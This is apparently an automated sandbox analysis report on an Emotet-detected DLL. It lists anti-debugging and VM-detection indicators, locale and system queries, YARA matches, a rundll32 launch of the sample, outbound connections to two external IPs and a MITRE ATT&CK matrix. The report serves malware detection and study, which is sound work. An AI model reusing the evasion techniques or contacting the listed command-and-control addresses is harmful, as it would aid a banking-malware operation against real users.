                      Source: svchost.exe, 00000014.00000002.822285678.0000020B39ED1000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.822309970.0000020B39EE9000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.822205344.0000020B39E82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.16.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.16.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.16.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.16.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1002DB0D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_1003E278
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10002D40 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,2_2_10002D40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBF7F7 mov eax, dword ptr fs:[00000030h]4_2_04CBF7F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350F7F7 mov eax, dword ptr fs:[00000030h]6_2_0350F7F7
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1003A8D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1002DB0D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1003A8D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1002DB0D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10032CB9

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7128 -ip 7128Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 568Jump to behavior
                      Source: loaddll32.exe, 00000000.00000000.720426982.0000000001260000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.722595476.0000000001260000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1187914001.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000000.720426982.0000000001260000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.722595476.0000000001260000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1187914001.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.720426982.0000000001260000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.722595476.0000000001260000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1187914001.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.720426982.0000000001260000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.722595476.0000000001260000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1187914001.00000000033E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,2_2_1003E000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,2_2_1003D098
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,2_2_1002129B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,2_2_1003D35E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,2_2_1003850E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_1003D7AE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_1003C7D2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_1003D8C5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,2_2_1003D95D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_1003D9D1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_1003F9F4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,2_2_1003EA86
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,2_2_1003EABA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_1003DBA3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_1003EBF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_1003E000
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_1003D098
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,3_2_1002129B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_1003D35E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,3_2_1003850E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_1003D7AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_1003C7D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_1003D8C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_1003D95D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_1003D9D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_1003F9F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,3_2_1003EA86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_1003EABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_1003DBA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_1003EBF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_1003DC64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_1003DCCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_1003DD07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_1003CE40
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003732F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_1003732F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10024F01 _memset,GetVersionExA,3_2_10024F01
                      Source: Amcache.hve.16.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 14.2.rundll32.exe.55b0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5030000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4770000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.53b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5510000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.52a0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.56f0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.59a0000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4cb0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.49a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.53e0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.52d0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5570000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.e10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5570000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.49d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5540000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.59d0000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.2510000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5a20000.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5a20000.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.53b0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.52d0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.de0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4740000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4c80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5300000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.52a0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.2540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.55e0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4c80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5110000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.55b0000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.57a0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5a50000.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5030000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.57d0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.57a0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.56c0000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5210000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.52f0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3500000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.2510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5140000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.52b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5510000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5060000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5110000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5270000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5130000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.e10000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5270000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.49a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.59a0000.18.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5160000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5130000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.56c0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5240000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5270000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5210000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4740000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.52b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188125968.00000000049D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190726376.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.718904101.00000000034D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719243124.0000000005161000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719379711.00000000052A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719211601.0000000005130000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190213897.00000000057D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719345888.0000000005270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719826672.00000000053B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719773637.00000000052F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188426833.0000000005110000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188330842.0000000005030000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719316941.0000000005241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719898030.0000000005510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.723238837.0000000004750000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188469714.0000000005141000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670020972.0000000004740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1186610997.0000000002E00000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188598739.00000000052A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719919636.0000000005541000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188659452.0000000005301000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.720219818.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.669938310.0000000002541000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.720240608.0000000000E11000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719503580.0000000004C80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188052400.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719747240.00000000052B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190813785.0000000005A20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719938381.0000000005570000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190127401.00000000057A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719857103.00000000053E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.722455601.0000000000E11000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719284878.0000000005210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188878871.00000000055E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1186687872.0000000002E31000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188363449.0000000005061000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190848028.0000000005A51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188631120.00000000052D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.722263663.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188973289.00000000056F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188839400.00000000055B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.723309788.0000000004781000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670044528.0000000004771000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188934735.00000000056C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.742599060.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188553677.0000000005270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.669913455.0000000002510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190787571.00000000059D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,2_2_10001160
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,3_2_10001160

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API2DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerSystem Information Discovery25SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
